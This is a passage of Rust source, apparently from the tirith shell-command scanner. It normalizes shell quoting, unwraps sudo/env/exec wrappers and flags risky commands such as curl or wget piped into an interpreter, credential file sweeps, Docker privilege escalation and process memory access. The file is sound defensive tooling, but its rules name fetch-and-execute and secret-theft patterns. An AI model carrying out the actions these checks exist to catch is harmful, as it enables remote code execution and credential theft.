tirith_core/rules/
command.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::extract::ScanContext;
5use crate::redact;
6use crate::tokenize::{self, ShellType};
7use crate::verdict::{Evidence, Finding, RuleId, Severity};
8
/// Canonical, lowercase names of every command treated as an interpreter.
///
/// `is_interpreter()` matches against this list, and a drift test validates it
/// against the tier-1 regex. Entry order is kept stable.
#[rustfmt::skip]
pub const INTERPRETERS: &[&str] = &[
    // Unix shells
    "sh", "bash", "zsh", "dash", "ksh", "fish", "csh", "tcsh", "ash", "mksh",
    // Scripting-language runtimes
    "python", "python2", "python3",
    "node", "deno", "bun",
    "perl", "ruby", "php", "lua", "tclsh", "elixir", "rscript",
    // PowerShell / Windows entries
    "pwsh", "iex", "invoke-expression", "cmd",
];
40
/// Parse up to `max_digits` chars from `chars[*i..]` that satisfy `predicate`,
/// interpret them as a base-`radix` number, and return the corresponding char.
///
/// `*i` is advanced past every consumed char, even when the result is `None`.
/// Returns `None` when no char was consumed, when a consumed char is not a
/// digit in `radix`, when the value overflows `u32`, or when the value is not a
/// valid Unicode scalar value (for example a surrogate).
///
/// The value is accumulated digit by digit: there is no heap allocation and no
/// fixed-size scratch buffer, so any `max_digits` is safe, and non-ASCII chars
/// accepted by `predicate` are rejected instead of being truncated to a byte.
/// `radix` must be in the range accepted by `char::to_digit` (`2..=36`).
fn parse_numeric_escape(
    chars: &[char],
    i: &mut usize,
    max_digits: usize,
    radix: u32,
    predicate: fn(&char) -> bool,
) -> Option<char> {
    // `None` records that the digits seen so far cannot form a valid number;
    // scanning still continues so `*i` ends up past the whole digit run.
    let mut value: Option<u32> = Some(0);
    let mut consumed = 0;
    while consumed < max_digits {
        let Some(ch) = chars.get(*i) else { break };
        if !predicate(ch) {
            break;
        }
        value = value.and_then(|acc| {
            let digit = ch.to_digit(radix)?;
            acc.checked_mul(radix)?.checked_add(digit)
        });
        consumed += 1;
        *i += 1;
    }
    if consumed == 0 {
        return None;
    }
    char::from_u32(value?)
}
69
70/// Strip all shell quoting/escaping from a token, producing the effective string
71/// the shell would see after expansion.
72///
73/// Handles: single quotes, double quotes, ANSI-C quoting (`$'...'`), backslash
74/// escaping (POSIX) and backtick escaping (PowerShell).
75fn normalize_shell_token(input: &str, shell: ShellType) -> String {
76    #[derive(PartialEq)]
77    enum QState {
78        Normal,
79        Single,
80        Double,
81        AnsiC,
82    }
83
84    let chars: Vec<char> = input.chars().collect();
85    let len = chars.len();
86    let mut out = String::with_capacity(len);
87    let mut i = 0;
88    let is_ps = matches!(shell, ShellType::PowerShell);
89    let is_cmd = matches!(shell, ShellType::Cmd);
90    let mut state = QState::Normal;
91
92    while i < len {
93        match state {
94            QState::Normal => {
95                let ch = chars[i];
96                if is_cmd && ch == '^' && i + 1 < len {
97                    // Cmd caret escape: skip caret, take next char literal
98                    out.push(chars[i + 1]);
99                    i += 2;
100                } else if !is_ps && !is_cmd && ch == '\\' && i + 1 < len {
101                    // POSIX backslash escape: skip backslash, take next char literal
102                    out.push(chars[i + 1]);
103                    i += 2;
104                } else if is_ps && ch == '`' && i + 1 < len {
105                    // PowerShell backtick escape
106                    out.push(chars[i + 1]);
107                    i += 2;
108                } else if ch == '\'' && !is_cmd {
109                    state = QState::Single;
110                    i += 1;
111                } else if ch == '"' {
112                    state = QState::Double;
113                    i += 1;
114                } else if shell == ShellType::Posix
115                    && ch == '$'
116                    && i + 1 < len
117                    && chars[i + 1] == '\''
118                {
119                    state = QState::AnsiC;
120                    i += 2;
121                } else {
122                    out.push(ch);
123                    i += 1;
124                }
125            }
126            // SINGLE_QUOTE: everything literal until closing '
127            QState::Single => {
128                if chars[i] == '\'' {
129                    // PowerShell: '' inside single quotes is an escaped literal '
130                    if is_ps && i + 1 < len && chars[i + 1] == '\'' {
131                        out.push('\'');
132                        i += 2;
133                    } else {
134                        state = QState::Normal;
135                        i += 1;
136                    }
137                } else {
138                    out.push(chars[i]);
139                    i += 1;
140                }
141            }
142            // DOUBLE_QUOTE
143            QState::Double => {
144                if chars[i] == '"' {
145                    state = QState::Normal;
146                    i += 1;
147                } else if is_cmd && chars[i] == '^' && i + 1 < len {
148                    // Cmd caret escaping is still active inside double quotes.
149                    out.push(chars[i + 1]);
150                    i += 2;
151                } else if !is_ps && chars[i] == '\\' && i + 1 < len {
152                    // POSIX: only \", \\, \$, \` are special inside double quotes
153                    let next = chars[i + 1];
154                    if next == '"' || next == '\\' || next == '$' || next == '`' {
155                        out.push(next);
156                        i += 2;
157                    } else {
158                        // literal backslash
159                        out.push('\\');
160                        out.push(next);
161                        i += 2;
162                    }
163                } else if is_ps && chars[i] == '`' && i + 1 < len {
164                    // PowerShell backtick escape inside double quotes
165                    out.push(chars[i + 1]);
166                    i += 2;
167                } else {
168                    out.push(chars[i]);
169                    i += 1;
170                }
171            }
172            // ANSIC_QUOTE (POSIX only): decode escape sequences
173            QState::AnsiC => {
174                if chars[i] == '\'' {
175                    state = QState::Normal;
176                    i += 1;
177                } else if chars[i] == '\\' && i + 1 < len {
178                    let esc = chars[i + 1];
179                    match esc {
180                        'n' => {
181                            out.push('\n');
182                            i += 2;
183                        }
184                        't' => {
185                            out.push('\t');
186                            i += 2;
187                        }
188                        'r' => {
189                            out.push('\r');
190                            i += 2;
191                        }
192                        '\\' => {
193                            out.push('\\');
194                            i += 2;
195                        }
196                        '\'' => {
197                            out.push('\'');
198                            i += 2;
199                        }
200                        '"' => {
201                            out.push('"');
202                            i += 2;
203                        }
204                        'a' => {
205                            out.push('\x07');
206                            i += 2;
207                        }
208                        'b' => {
209                            out.push('\x08');
210                            i += 2;
211                        }
212                        'e' | 'E' => {
213                            out.push('\x1b');
214                            i += 2;
215                        }
216                        'f' => {
217                            out.push('\x0c');
218                            i += 2;
219                        }
220                        'v' => {
221                            out.push('\x0b');
222                            i += 2;
223                        }
224                        'x' => {
225                            // \xHH — 1 or 2 hex digits
226                            i += 2;
227                            if let Some(c) =
228                                parse_numeric_escape(&chars, &mut i, 2, 16, char::is_ascii_hexdigit)
229                            {
230                                out.push(c);
231                            }
232                        }
233                        'u' => {
234                            // \uHHHH — 1 to 4 hex digits
235                            i += 2;
236                            if let Some(c) =
237                                parse_numeric_escape(&chars, &mut i, 4, 16, char::is_ascii_hexdigit)
238                            {
239                                out.push(c);
240                            }
241                        }
242                        'U' => {
243                            // \UHHHHHHHH — 1 to 8 hex digits
244                            i += 2;
245                            if let Some(c) =
246                                parse_numeric_escape(&chars, &mut i, 8, 16, char::is_ascii_hexdigit)
247                            {
248                                out.push(c);
249                            }
250                        }
251                        c if c.is_ascii_digit() && c <= '7' => {
252                            // \NNN octal — 1 to 3 octal digits
253                            i += 1; // skip backslash
254                            if let Some(c) = parse_numeric_escape(&chars, &mut i, 3, 8, |c| {
255                                c.is_ascii_digit() && *c <= '7'
256                            }) {
257                                out.push(c);
258                            }
259                        }
260                        _ => {
261                            // Unknown escape: emit literal
262                            out.push('\\');
263                            out.push(esc);
264                            i += 2;
265                        }
266                    }
267                } else {
268                    out.push(chars[i]);
269                    i += 1;
270                }
271            }
272        }
273    }
274    out
275}
276
277/// Extract the effective command base name from a raw token.
278///
279/// Normalize → path basename → first word → lowercase → strip .exe
280fn normalize_cmd_base(raw: &str, shell: ShellType) -> String {
281    let normalized = normalize_shell_token(raw.trim(), shell);
282    basename_from_normalized(&normalized, shell)
283}
284
285/// Extract basename from an already-normalized (unquoted) string.
286/// Handles path separators, first-word extraction, lowercasing, and .exe stripping.
287fn basename_from_normalized(normalized: &str, shell: ShellType) -> String {
288    let has_path_sep = match shell {
289        ShellType::PowerShell | ShellType::Cmd => {
290            normalized.contains('/') || normalized.contains('\\')
291        }
292        _ => normalized.contains('/'),
293    };
294    let after_path = if has_path_sep {
295        match shell {
296            ShellType::PowerShell | ShellType::Cmd => {
297                normalized.rsplit(['/', '\\']).next().unwrap_or(normalized)
298            }
299            _ => normalized.rsplit('/').next().unwrap_or(normalized),
300        }
301    } else {
302        normalized
303    };
304    let first_word = after_path.split_whitespace().next().unwrap_or("");
305    let lower = first_word.to_lowercase();
306    if lower.ends_with(".exe") {
307        lower[..lower.len() - 4].to_string()
308    } else {
309        lower
310    }
311}
312
313fn is_interpreter(cmd: &str) -> bool {
314    INTERPRETERS.contains(&cmd)
315}
316
317/// Run command-shape rules.
318pub fn check(
319    input: &str,
320    shell: ShellType,
321    cwd: Option<&str>,
322    scan_context: ScanContext,
323) -> Vec<Finding> {
324    let mut findings = Vec::new();
325    let segments = tokenize::tokenize(input, shell);
326
327    // Check for pipe-to-interpreter patterns
328    let has_pipe = segments.iter().any(|s| {
329        s.preceding_separator.as_deref() == Some("|")
330            || s.preceding_separator.as_deref() == Some("|&")
331    });
332    if has_pipe {
333        check_pipe_to_interpreter(&segments, shell, &mut findings);
334    }
335
336    // Check for insecure TLS flags in source commands
337    for segment in &segments {
338        if let Some(ref cmd) = segment.command {
339            let cmd_base = normalize_cmd_base(cmd, shell);
340            if is_source_command(&cmd_base) {
341                let tls_findings =
342                    crate::rules::transport::check_insecure_flags(&segment.args, true);
343                findings.extend(tls_findings);
344            }
345        }
346    }
347
348    // Check for dotfile overwrites
349    check_dotfile_overwrite(&segments, &mut findings);
350
351    // Check for archive extraction to sensitive paths
352    check_archive_extract(&segments, &mut findings);
353
354    // Check for process memory access
355    check_proc_mem_access(&segments, shell, &mut findings);
356
357    // Check for Docker remote privilege escalation
358    check_docker_remote_privesc(&segments, shell, &mut findings);
359
360    // Check for credential file sweep (exec-only)
361    check_credential_file_sweep(&segments, shell, scan_context, &mut findings);
362
363    // Check for cargo install/add without supply-chain audit (exec-only)
364    if scan_context == ScanContext::Exec {
365        check_vet_not_configured(&segments, cwd, &mut findings);
366    }
367
368    // Check for dangerous environment variable exports
369    check_env_var_in_command(&segments, &mut findings);
370
371    // Check for network destination access (metadata endpoints, private networks)
372    check_network_destination(&segments, &mut findings);
373
374    findings
375}
376
377/// Resolve the effective interpreter from a segment, handling all quoting forms,
378/// wrappers (sudo, env, command, exec, nohup), subshells, and brace groups.
379fn resolve_interpreter_name(seg: &tokenize::Segment, shell: ShellType) -> Option<String> {
380    if let Some(ref cmd) = seg.command {
381        let cmd_base = normalize_cmd_base(cmd, shell);
382
383        // Direct interpreter
384        if is_interpreter(&cmd_base) {
385            return Some(cmd_base);
386        }
387
388        // Subshell: (bash) → strip parens, check
389        let stripped = cmd_base.trim_start_matches('(').trim_end_matches(')');
390        if stripped != cmd_base && is_interpreter(stripped) {
391            return Some(stripped.to_string());
392        }
393
394        // Brace group: { → first arg is command
395        if cmd_base == "{" {
396            return resolve_from_args(&seg.args, shell);
397        }
398
399        // Known wrappers
400        match cmd_base.as_str() {
401            "sudo" => return resolve_sudo_args(&seg.args, shell),
402            "env" => return resolve_env_args(&seg.args, shell),
403            "command" | "exec" | "nohup" => {
404                return resolve_wrapper_args(&seg.args, &cmd_base, shell);
405            }
406            _ => {}
407        }
408    }
409    None
410}
411
412/// Resolve the base command from a segment, stripping sudo/env/command/nohup/exec wrappers.
413/// Returns the normalized base command name (lowercase, .exe stripped).
414/// Unlike `resolve_interpreter_name`, this returns ANY command — not just interpreters.
415fn resolve_base_through_wrappers(seg: &tokenize::Segment, shell: ShellType) -> String {
416    let Some(ref cmd) = seg.command else {
417        return String::new();
418    };
419    let cmd_base = normalize_cmd_base(cmd, shell);
420
421    match cmd_base.as_str() {
422        "sudo" => resolve_base_sudo(&seg.args, shell).unwrap_or(cmd_base),
423        "env" => resolve_base_env(&seg.args, shell).unwrap_or(cmd_base),
424        "command" | "exec" | "nohup" => {
425            resolve_base_wrapper(&seg.args, &cmd_base, shell).unwrap_or(cmd_base)
426        }
427        _ => cmd_base,
428    }
429}
430
431/// Resolve base command through sudo wrapper.
432fn resolve_base_sudo(args: &[String], shell: ShellType) -> Option<String> {
433    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
434    let value_long_flags = [
435        "--user",
436        "--group",
437        "--close-from",
438        "--chdir",
439        "--role",
440        "--type",
441        "--other-user",
442        "--host",
443        "--timeout",
444    ];
445    let mut idx = 0;
446    while idx < args.len() {
447        let normalized = normalize_shell_token(args[idx].trim(), shell);
448        if normalized == "--" {
449            // Next positional after -- is the command
450            if idx + 1 < args.len() {
451                return Some(normalize_cmd_base(&args[idx + 1], shell));
452            }
453            return None;
454        }
455        if normalized.starts_with("--") {
456            if value_long_flags.iter().any(|f| normalized == *f) {
457                idx += 2;
458            } else {
459                idx += 1;
460            }
461            continue;
462        }
463        if normalized.starts_with('-') {
464            if value_short_flags.iter().any(|f| normalized == *f)
465                || (normalized.len() > 2
466                    && value_short_flags
467                        .iter()
468                        .any(|f| normalized.ends_with(&f[1..])))
469            {
470                idx += 2;
471            } else {
472                idx += 1;
473            }
474            continue;
475        }
476        // First positional is the command — recurse for nested wrappers
477        let base = normalize_cmd_base(&args[idx], shell);
478        return match base.as_str() {
479            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
480            "env" => resolve_base_env(&args[idx + 1..], shell),
481            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
482            _ => Some(base),
483        };
484    }
485    None
486}
487
488/// Resolve base command through env wrapper.
489fn resolve_base_env(args: &[String], shell: ShellType) -> Option<String> {
490    let value_short_flags = ["-u", "-C"];
491    let value_long_flags = [
492        "--unset",
493        "--chdir",
494        "--split-string",
495        "--block-signal",
496        "--default-signal",
497        "--ignore-signal",
498    ];
499    let mut idx = 0;
500    while idx < args.len() {
501        let normalized = normalize_shell_token(args[idx].trim(), shell);
502        if normalized == "--" {
503            if idx + 1 < args.len() {
504                return Some(normalize_cmd_base(&args[idx + 1], shell));
505            }
506            return None;
507        }
508        if normalized.starts_with("--") {
509            if normalized == "--split-string" {
510                if idx + 1 < args.len() {
511                    return resolve_base_from_command_string(&args[idx + 1], shell);
512                }
513                return None;
514            }
515            if let Some(val) = normalized.strip_prefix("--split-string=") {
516                return resolve_base_from_command_string(val, shell);
517            }
518            if value_long_flags.iter().any(|f| normalized == *f) {
519                idx += 2;
520            } else {
521                idx += 1;
522            }
523            continue;
524        }
525        if normalized == "-S" {
526            if idx + 1 < args.len() {
527                return resolve_base_from_command_string(&args[idx + 1], shell);
528            }
529            return None;
530        }
531        if normalized.starts_with('-') {
532            if value_short_flags.iter().any(|f| normalized == *f) {
533                idx += 2;
534            } else {
535                idx += 1;
536            }
537            continue;
538        }
539        // VAR=VALUE assignments
540        if normalized.contains('=') {
541            idx += 1;
542            continue;
543        }
544        // First positional is the command
545        let base = normalize_cmd_base(&args[idx], shell);
546        return match base.as_str() {
547            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
548            "env" => resolve_base_env(&args[idx + 1..], shell),
549            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
550            _ => Some(base),
551        };
552    }
553    None
554}
555
556fn resolve_base_from_command_string(command: &str, shell: ShellType) -> Option<String> {
557    let normalized = normalize_shell_token(command.trim(), shell);
558    if normalized.is_empty() {
559        return None;
560    }
561
562    let segments = tokenize::tokenize(&normalized, shell);
563    let first = segments.first()?;
564    let base = resolve_base_through_wrappers(first, shell);
565    if base.is_empty() {
566        None
567    } else {
568        Some(base)
569    }
570}
571
572fn unwrap_env_split_string_segment(
573    seg: &tokenize::Segment,
574    shell: ShellType,
575) -> Option<tokenize::Segment> {
576    let command = seg.command.as_ref()?;
577    if normalize_cmd_base(command, shell) != "env" {
578        return None;
579    }
580
581    let value_short_flags = ["-u", "-C"];
582    let value_long_flags = [
583        "--unset",
584        "--chdir",
585        "--block-signal",
586        "--default-signal",
587        "--ignore-signal",
588    ];
589
590    let args = &seg.args;
591    let mut idx = 0;
592    while idx < args.len() {
593        let normalized = normalize_shell_token(args[idx].trim(), shell);
594        if normalized == "--split-string" || normalized == "-S" {
595            let command = args.get(idx + 1)?;
596            let normalized_command = normalize_shell_token(command.trim(), shell);
597            return tokenize::tokenize(&normalized_command, shell)
598                .into_iter()
599                .next();
600        }
601        if let Some(val) = normalized.strip_prefix("--split-string=") {
602            let normalized_command = normalize_shell_token(val.trim(), shell);
603            return tokenize::tokenize(&normalized_command, shell)
604                .into_iter()
605                .next();
606        }
607        if normalized == "--" {
608            return None;
609        }
610        if normalized.starts_with("--") {
611            if value_long_flags.iter().any(|f| normalized == *f) {
612                idx += 2;
613            } else {
614                idx += 1;
615            }
616            continue;
617        }
618        if normalized.starts_with('-') {
619            if value_short_flags.iter().any(|f| normalized == *f) {
620                idx += 2;
621            } else {
622                idx += 1;
623            }
624            continue;
625        }
626        if normalized.contains('=') {
627            idx += 1;
628            continue;
629        }
630        return None;
631    }
632    None
633}
634
635/// Resolve base command through command/exec/nohup wrappers.
636fn resolve_base_wrapper(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
637    let value_flags: &[&str] = match wrapper {
638        "exec" => &["-a"],
639        _ => &[],
640    };
641    let mut idx = 0;
642    while idx < args.len() {
643        let normalized = normalize_shell_token(args[idx].trim(), shell);
644        if normalized == "--" {
645            if idx + 1 < args.len() {
646                return Some(normalize_cmd_base(&args[idx + 1], shell));
647            }
648            return None;
649        }
650        if normalized.starts_with("--") || normalized.starts_with('-') {
651            if value_flags.iter().any(|f| normalized == *f) {
652                idx += 2;
653            } else {
654                idx += 1;
655            }
656            continue;
657        }
658        let base = normalize_cmd_base(&args[idx], shell);
659        return match base.as_str() {
660            "sudo" => resolve_base_sudo(&args[idx + 1..], shell),
661            "env" => resolve_base_env(&args[idx + 1..], shell),
662            "command" | "exec" | "nohup" => resolve_base_wrapper(&args[idx + 1..], &base, shell),
663            _ => Some(base),
664        };
665    }
666    None
667}
668
/// Selects which option grammar `resolve_with_parser` applies to the
/// arguments it is currently looking at.
#[derive(Clone, Copy)]
enum ResolverParser {
    /// Plain argument list; dispatched to `resolve_step_generic`.
    Generic,
    /// Arguments of `sudo`; dispatched to `resolve_step_sudo`.
    Sudo,
    /// Arguments of `env`; dispatched to `resolve_step_env`.
    Env,
    /// Arguments of `command`; dispatched to `resolve_step_wrapper`.
    Command,
    /// Arguments of `exec`; dispatched to `resolve_step_wrapper`.
    Exec,
    /// Arguments of `nohup`; dispatched to `resolve_step_wrapper`.
    Nohup,
}
678
/// Outcome of a single parsing step inside `resolve_with_parser`.
enum ResolveStep<'a> {
    /// An interpreter was identified; carries its normalized name.
    Found(String),
    /// Resolution should continue with another parser.
    Next {
        /// Parser to run on the next iteration.
        parser: ResolverParser,
        /// Arguments the next parser should examine.
        args: &'a [String],
        /// Number of tokens this step looked at; deducted from the budget.
        inspected: usize,
    },
    /// Resolution ended without finding an interpreter.
    Stop,
}
688
/// Resolve the interpreter from a generic argument list (no wrapper-specific
/// options), e.g. the contents of a brace group.
///
/// Delegates to `resolve_with_parser`, an iterative parser with a
/// token-inspection budget, so deeply nested wrappers cannot bypass detection.
/// Returns `None` when no interpreter is found.
fn resolve_from_args(args: &[String], shell: ShellType) -> Option<String> {
    resolve_with_parser(args, shell, ResolverParser::Generic)
}
694
/// Resolve the interpreter invoked through `sudo`, given sudo's arguments.
///
/// Starts `resolve_with_parser` with the sudo option grammar. Returns `None`
/// when no interpreter is found.
fn resolve_sudo_args(args: &[String], shell: ShellType) -> Option<String> {
    resolve_with_parser(args, shell, ResolverParser::Sudo)
}
698
/// Resolve the interpreter invoked through `env`, given env's arguments.
///
/// Starts `resolve_with_parser` with the env option grammar. Returns `None`
/// when no interpreter is found.
fn resolve_env_args(args: &[String], shell: ShellType) -> Option<String> {
    resolve_with_parser(args, shell, ResolverParser::Env)
}
702
703fn resolve_wrapper_args(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
704    let parser = match wrapper {
705        "command" => ResolverParser::Command,
706        "exec" => ResolverParser::Exec,
707        "nohup" => ResolverParser::Nohup,
708        _ => ResolverParser::Command,
709    };
710    resolve_with_parser(args, shell, parser)
711}
712
713fn resolve_with_parser(
714    args: &[String],
715    shell: ShellType,
716    start_parser: ResolverParser,
717) -> Option<String> {
718    if args.is_empty() {
719        return None;
720    }
721
722    let mut parser = start_parser;
723    let mut current = args;
724    // Budget scales with input size and keeps resolution bounded even on adversarial inputs.
725    let mut budget = args.len().saturating_mul(4).saturating_add(8);
726
727    while budget > 0 && !current.is_empty() {
728        let step = match parser {
729            ResolverParser::Generic => resolve_step_generic(current, shell),
730            ResolverParser::Sudo => resolve_step_sudo(current, shell),
731            ResolverParser::Env => resolve_step_env(current, shell),
732            ResolverParser::Command => resolve_step_wrapper(current, shell, "command"),
733            ResolverParser::Exec => resolve_step_wrapper(current, shell, "exec"),
734            ResolverParser::Nohup => resolve_step_wrapper(current, shell, "nohup"),
735        };
736
737        match step {
738            ResolveStep::Found(interpreter) => return Some(interpreter),
739            ResolveStep::Stop => return None,
740            ResolveStep::Next {
741                parser: next_parser,
742                args: next_args,
743                inspected,
744            } => {
745                parser = next_parser;
746                current = next_args;
747                budget = budget.saturating_sub(inspected.max(1));
748            }
749        }
750    }
751    None
752}
753
754fn resolve_step_generic<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
755    let mut idx = 0;
756    let mut seen_dashdash = false;
757    while idx < args.len() {
758        let raw = args[idx].trim();
759        let normalized = normalize_shell_token(raw, shell);
760
761        // Track end-of-options marker
762        if normalized == "--" {
763            seen_dashdash = true;
764            idx += 1;
765            continue;
766        }
767
768        // Skip flags and assignments (only before --)
769        if !seen_dashdash
770            && (normalized.starts_with("--")
771                || normalized.starts_with('-')
772                || normalized.contains('='))
773        {
774            idx += 1;
775            continue;
776        }
777
778        let base = basename_from_normalized(&normalized, shell);
779        return match base.as_str() {
780            "sudo" => ResolveStep::Next {
781                parser: ResolverParser::Sudo,
782                args: &args[idx + 1..],
783                inspected: idx + 1,
784            },
785            "env" => ResolveStep::Next {
786                parser: ResolverParser::Env,
787                args: &args[idx + 1..],
788                inspected: idx + 1,
789            },
790            "command" => ResolveStep::Next {
791                parser: ResolverParser::Command,
792                args: &args[idx + 1..],
793                inspected: idx + 1,
794            },
795            "exec" => ResolveStep::Next {
796                parser: ResolverParser::Exec,
797                args: &args[idx + 1..],
798                inspected: idx + 1,
799            },
800            "nohup" => ResolveStep::Next {
801                parser: ResolverParser::Nohup,
802                args: &args[idx + 1..],
803                inspected: idx + 1,
804            },
805            _ if is_interpreter(&base) => ResolveStep::Found(base),
806            _ => ResolveStep::Stop,
807        };
808    }
809    ResolveStep::Stop
810}
811
812fn resolve_step_sudo<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
813    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
814    let value_long_flags = [
815        "--user",
816        "--group",
817        "--close-from",
818        "--chdir",
819        "--role",
820        "--type",
821        "--other-user",
822        "--host",
823        "--timeout",
824    ];
825
826    let mut idx = 0;
827    while idx < args.len() {
828        let raw = args[idx].trim();
829        let normalized = normalize_shell_token(raw, shell);
830        // -- ends option parsing; remaining args are the command
831        if normalized == "--" {
832            return ResolveStep::Next {
833                parser: ResolverParser::Generic,
834                args: &args[(idx + 1).min(args.len())..],
835                inspected: idx + 1,
836            };
837        }
838        if normalized.starts_with("--") {
839            if value_long_flags.iter().any(|f| normalized == *f) {
840                idx += 2;
841                continue;
842            }
843            if let Some((key, _)) = normalized.split_once('=') {
844                if value_long_flags.contains(&key) {
845                    idx += 1;
846                    continue;
847                }
848            }
849            // Unknown long flag: treat as boolean.
850            idx += 1;
851            continue;
852        }
853        if normalized.starts_with('-') {
854            if value_short_flags.iter().any(|f| normalized == *f) {
855                // Exact match: e.g. -u → next arg is the value
856                idx += 2;
857            } else if normalized.len() > 2
858                && value_short_flags.iter().any(|f| {
859                    normalized.ends_with(&f[1..]) // last char matches value-flag letter
860                })
861            {
862                // Combined short flags: e.g. -iu → -i + -u, last flag takes a value
863                idx += 2;
864            } else {
865                idx += 1;
866            }
867            continue;
868        }
869        return ResolveStep::Next {
870            parser: ResolverParser::Generic,
871            args: &args[idx..],
872            inspected: idx + 1,
873        };
874    }
875    ResolveStep::Stop
876}
877
878fn resolve_step_env<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
879    let value_short_flags = ["-u", "-C"];
880    let value_long_flags = [
881        "--unset",
882        "--chdir",
883        "--split-string",
884        "--block-signal",
885        "--default-signal",
886        "--ignore-signal",
887    ];
888
889    let mut idx = 0;
890    while idx < args.len() {
891        let raw = args[idx].trim();
892        let normalized = normalize_shell_token(raw, shell);
893        // -- ends option parsing; remaining args are the command
894        if normalized == "--" {
895            return ResolveStep::Next {
896                parser: ResolverParser::Generic,
897                args: &args[(idx + 1).min(args.len())..],
898                inspected: idx + 1,
899            };
900        }
901        if normalized.starts_with("--") {
902            // --split-string: value is a command string.
903            if normalized == "--split-string" {
904                if idx + 1 < args.len() {
905                    let base = normalize_cmd_base(&args[idx + 1], shell);
906                    if is_interpreter(&base) {
907                        return ResolveStep::Found(base);
908                    }
909                }
910                idx += 2;
911                continue;
912            }
913            if let Some(val) = normalized.strip_prefix("--split-string=") {
914                let base = normalize_cmd_base(val, shell);
915                if is_interpreter(&base) {
916                    return ResolveStep::Found(base);
917                }
918                idx += 1;
919                continue;
920            }
921            if value_long_flags.iter().any(|f| normalized == *f) {
922                idx += 2;
923                continue;
924            }
925            if let Some((key, _)) = normalized.split_once('=') {
926                if value_long_flags.contains(&key) {
927                    idx += 1;
928                    continue;
929                }
930            }
931            // Unknown long flag: treat as boolean.
932            idx += 1;
933            continue;
934        }
935        if normalized == "-S" {
936            // -S: value is a command string.
937            if idx + 1 < args.len() {
938                let base = normalize_cmd_base(&args[idx + 1], shell);
939                if is_interpreter(&base) {
940                    return ResolveStep::Found(base);
941                }
942            }
943            idx += 2;
944            continue;
945        }
946        if normalized.starts_with('-') {
947            if value_short_flags.iter().any(|f| normalized == *f) {
948                idx += 2;
949            } else {
950                idx += 1;
951            }
952            continue;
953        }
954        if normalized.contains('=') {
955            idx += 1;
956            continue;
957        }
958        return ResolveStep::Next {
959            parser: ResolverParser::Generic,
960            args: &args[idx..],
961            inspected: idx + 1,
962        };
963    }
964    ResolveStep::Stop
965}
966
967fn resolve_step_wrapper<'a>(
968    args: &'a [String],
969    shell: ShellType,
970    wrapper: &str,
971) -> ResolveStep<'a> {
972    let value_flags: &[&str] = match wrapper {
973        "exec" => &["-a"],
974        _ => &[],
975    };
976
977    let mut idx = 0;
978    while idx < args.len() {
979        let raw = args[idx].trim();
980        let normalized = normalize_shell_token(raw, shell);
981        // -- ends option parsing; remaining args are the command
982        if normalized == "--" {
983            return ResolveStep::Next {
984                parser: ResolverParser::Generic,
985                args: &args[(idx + 1).min(args.len())..],
986                inspected: idx + 1,
987            };
988        }
989        if normalized.starts_with("--") || normalized.starts_with('-') {
990            if value_flags.iter().any(|f| normalized == *f) {
991                idx += 2;
992            } else {
993                idx += 1;
994            }
995            continue;
996        }
997        return ResolveStep::Next {
998            parser: ResolverParser::Generic,
999            args: &args[idx..],
1000            inspected: idx + 1,
1001        };
1002    }
1003    ResolveStep::Stop
1004}
1005
1006fn check_pipe_to_interpreter(
1007    segments: &[tokenize::Segment],
1008    shell: ShellType,
1009    findings: &mut Vec<Finding>,
1010) {
1011    for (i, seg) in segments.iter().enumerate() {
1012        if i == 0 {
1013            continue;
1014        }
1015        if let Some(sep) = &seg.preceding_separator {
1016            if sep == "|" || sep == "|&" {
1017                if let Some(interpreter) = resolve_interpreter_name(seg, shell) {
1018                    // i > 0 is guaranteed — the loop skips i == 0 above.
1019                    let source = &segments[i - 1];
1020                    let source_cmd_ref = source.command.as_deref().unwrap_or("unknown");
1021                    let source_base = normalize_cmd_base(source_cmd_ref, shell);
1022                    let source_is_tirith_run = source_base == "tirith"
1023                        && source
1024                            .args
1025                            .first()
1026                            .map(|arg| normalize_cmd_base(arg, shell) == "run")
1027                            .unwrap_or(false);
1028                    let source_label = if source_is_tirith_run {
1029                        "tirith run".to_string()
1030                    } else {
1031                        source_base.clone()
1032                    };
1033
1034                    // Skip if the source is tirith itself — its output is trusted.
1035                    if source_base == "tirith" && !source_is_tirith_run {
1036                        continue;
1037                    }
1038
1039                    let rule_id = match source_base.as_str() {
1040                        "curl" => RuleId::CurlPipeShell,
1041                        "wget" => RuleId::WgetPipeShell,
1042                        "http" | "https" => RuleId::HttpiePipeShell,
1043                        "xh" => RuleId::XhPipeShell,
1044                        _ => RuleId::PipeToInterpreter,
1045                    };
1046
1047                    let display_cmd = seg.command.as_deref().unwrap_or(&interpreter);
1048
1049                    let base_desc = format!(
1050                        "Command pipes output from '{source_label}' directly to \
1051                         interpreter '{interpreter}'. Downloaded content will be \
1052                         executed without inspection."
1053                    );
1054
1055                    let description = if is_url_fetch_command(&source_base) {
1056                        let show_tirith_run = cfg!(unix)
1057                            && supports_tirith_run_hint(&source_base)
1058                            && shell != ShellType::PowerShell;
1059                        if let Some(url) = extract_urls_from_args(&source.args, shell)
1060                            .into_iter()
1061                            .next()
1062                            .map(|u| sanitize_url_for_display(&u))
1063                        {
1064                            if show_tirith_run {
1065                                format!(
1066                                    "{base_desc}\n  Safer: tirith run {url}  \
1067                                     \u{2014} or: vet {url}  (https://getvet.sh)"
1068                                )
1069                            } else {
1070                                format!(
1071                                    "{base_desc}\n  Safer: vet {url}  \
1072                                     (https://getvet.sh)"
1073                                )
1074                            }
1075                        } else if show_tirith_run {
1076                            format!(
1077                                "{base_desc}\n  Safer: use 'tirith run <url>' \
1078                                 or 'vet <url>' (https://getvet.sh) to inspect \
1079                                 before executing."
1080                            )
1081                        } else {
1082                            format!(
1083                                "{base_desc}\n  Safer: use 'vet <url>' \
1084                                 (https://getvet.sh) to inspect before executing."
1085                            )
1086                        }
1087                    } else {
1088                        base_desc
1089                    };
